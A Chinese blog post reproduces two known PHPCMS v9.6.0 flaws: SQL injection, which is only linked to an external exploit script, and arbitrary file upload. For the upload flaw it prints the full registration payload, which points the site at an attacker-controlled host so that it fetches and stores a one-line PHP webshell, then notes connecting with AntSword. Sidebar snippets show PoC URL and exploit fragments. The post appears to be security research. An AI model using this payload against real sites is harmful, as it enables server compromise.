phpcms v9.6.0 sql注入 & 文件上传

最新推荐文章于 2023-09-11 17:53:44 发布
最新推荐文章于 2023-09-11 17:53:44 发布
阅读量710 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: php sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/116755688
版权

phpcms v9.6.0 sql注入漏洞

漏洞分析详解:http://blog.nsfocus.net/phpcms-v9-6-content-module-sql-injection-vulnerability-analysis/

这里直接利用exp,python脚本来复现漏洞:https://www.cnblogs.com/Spec/p/10844822.html,需要在文件中更改url和语句来使用

暴出库名和表明(由于长度限制而显示不全):
在这里插入图片描述

phpcms v9.6.0 文件上传漏洞

漏洞原理分析详解:https://paper.seebug.org/273/

来到注册页面填写信息:
在这里插入图片描述
提交并抓包,将内容替换为以下payload:

siteid=1&modelid=11&username=hacker8888&password=hacker&email=hacker8888@163.com&info[content]=<img src=http://xx.xx.xx.xx/xx.txt?.php#.jpg>&dosubmit=1&protocol=

注意:modelid的值必须为11,否则无法成功,ip可以替换为vps的ip或网址,来上传一句话木马文件。

放包之后得到响应包,可见包含了上传文件的地址:
在这里插入图片描述
访问木马地址,执行phpinfo();成功:
在这里插入图片描述
蚁剑成功连接:
在这里插入图片描述

参考链接:
http://blog.nsfocus.net/phpcms-v9-6-content-module-sql-injection-vulnerability-analysis/(PHPCMS V9.6 CONTENT模块SQL注入漏洞分析)
https://paper.seebug.org/273/(PHPCMS v9.6.0任意文件上传扩展分析)
https://www.freebuf.com/vuls/131648.html(PHPcms9.6.0最新版任意文件上传扩展)

yAnd0n9
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPCMS定时执行sql
OMIALAM的博客
10-11 860
问题:phpcms每45分钟查询一次数据库,更新已过期的数据状态。解决:建立单独的php文件;<?phpdefine('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR); //定义根路径include_once PHPCMS_PATH.'/phpcms/base.php'; //引入phpcms入口文件pc_base::load_sys_cla
PHPCMS V9 SQL查询篇
changeriver的博客
06-01 506
添加查询条件 {php KaTeX parse error: Expected 'EOF', got '}' at position 28: …_type_int = 24"}̲ {pc:content ac…sql5" num=“1” order=“listorder asc,inputtime asc” page=“page"cache="page" cache="page"cache="cachetime” }同时调用指定栏目和指定推荐位 {pc:get sql=“SELECT * FROM v9
网站安全漏洞测试之CMS上传与sql注入攻击
网站安全专家
06-03 1194
近日,我们SINE安全在对某客户的网站进行网站漏洞检测与修复发现该网站存在严重的sql注入漏洞以及上传webshell网站木马文件漏洞,该网站使用的是某CMS系统,采用PHP语言开发,mysql数据库的架构,该网站源码目前是开源的状态。 某CMS是专注于提供付费知识的社交CMS系统,知识付费在目前的互联网中有这很高的需求,该系统可以对文档进行分享,收费下载,用户发布的知识内容可以隐藏,提供给...
PHPCMS V9.6.0 SQL注入漏洞EXP
weixin_30664615的博客
05-10 870
运行于python3.5 import requests import time import re import sys def banner(): msg = '''--------------EXP IS PHPCMS V9.6.0---------------''' print(msg) def get_encrypt_value(payload,url): ...
2-PHP代码审计——PHPCMSV9.6.0 sql注入漏洞
网络安全
03-31 1825
漏洞环境:PHPCMSV9.6 实验环境的poc: /index.php?m=wap&c=index&siteid=1 userid_flash=b3a3Dv_ICFSxJ_SDlQhbf6cdklSxsLje2RJwBTGknbusMO0 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Ccon..
phpcms v9.6.0版本
09-09
phpcms v9.6.0版本】是一个重要的里程碑,它是phpcms内容管理系统的一个特定发行版,具有特定的安全性和功能特性。此版本被保留下来,主要是为了研究和学习目的,尤其是针对其中已知的安全问题——前台getshell...
PHPCMS v9.6.0 GBK
10-23
 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
phpcms数据库操作
weixin_34355881的博客
08-01 149
一、查 ①select($where = '', $data = '*', $limit = '', $order = '', $group = '', $key='') /** * 执行sql查询 * @param $where 查询条件[例`name`='$name'] * @param $data 需要查询的字段值[...
基于phpcmsSQL手工注入
qq_44060093的博客
08-20 495
步骤一: 探测目标网站有无sql注入点 试探目标网站 分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。 and 1=1 and 1=2 发现不需要闭合但引号,判断为注入类型为整数型 第一次加单引号时,发生报错,发现了数据库类型为mysql 步骤二、判断字段长度 利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15 判断字段为15个 步骤三、判断字段
对某网站的渗透(SQL注入+上传Getshell)
热门推荐
江左盟的博客
04-22 1万+
信息收集 访问网站发现网站不存在robots.txt文件,扫描网站根目录未发现有价值的信息,点击网站按钮查看功能的时候发现有个路径是xxcms/…,然后访问xxcms发现网站跳转到后台,如图: 尝试弱口令和暴力枚举未发现正确口令,然后扫描xxcms目录发现一个未授权上传文件的页面,如图: 但是之能上传图片和office文档,尝试绕过失败,在主页和“投诉建议”功能处存在搜索框,但不存在SQL注入,如图: 点击“我要投诉/建议”发现可以写数据并提交,如图: 点击按钮之后其中一个数据包如图: 漏洞发现
phpcms <php,代码审计| phpcms 9.6.2 任意文件下载与前台SQL注入
weixin_30995661的博客
04-08 284
0x00 背景最近做代码审计的时候发现phpcms 有更新,现在漏洞详情基本不公开,想要知道漏洞的利用方法只能自己审计了,通常可进行新旧版本的代码比较了,来定位旧版本的漏洞位置,便下载了phpcms 9.6.3与phpcms 9.6.1 和phpcms 9.6.2的源码进行比较和审计,发现phpcms 9.6.2 中存在任意文件下载补丁绕过和前台SQL注入,便撰写了本文做个记录,期待和师傅们的各种...
phpcmsV9.6.0sql注入漏洞分析
最新发布
shelter1234567的博客
09-11 1493
本次分析phpcmsV9.6.0sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
PHPCMS V9.6.0 SQL注入漏洞分析
weixin_30919429的博客
05-10 1978
0x01 此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似。且较为有趣,故在此分析并附上exp。 0x02 首先复现漏洞,环境为:   PHP:5.4.45 + Apache   mysql:5.5.53   PHPCMSV9.6.0-UTF-8   Microsoft Windows 7 旗舰版OS 版本: 6.1.7601 Service...
php %3cimg,phpcmsV9.6.0注入+前台getshell
weixin_39957186的博客
03-18 3576
# phpcms v9.6.0 sqli and getshell# code by : whoam1# blog : http://www.cnnetarmy.comimportrequestsimportrandomimportstringimporthashlibimportreimportthreadingdefsqli(host):try:url1='{}/index.php?m=w...
文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2227
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
phpcms源码分析:入口文件与性能优化
`PHPCMS_ROOT` 常量定义了phpcms的安装目录,方便在其他文件中引用。`dirname(__FILE__)` 返回当前文件的父目录,`substr` 函数截取到不含最后特定字符(这里是".inc.php"的前8个字符),最后用 `str_replace` 将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值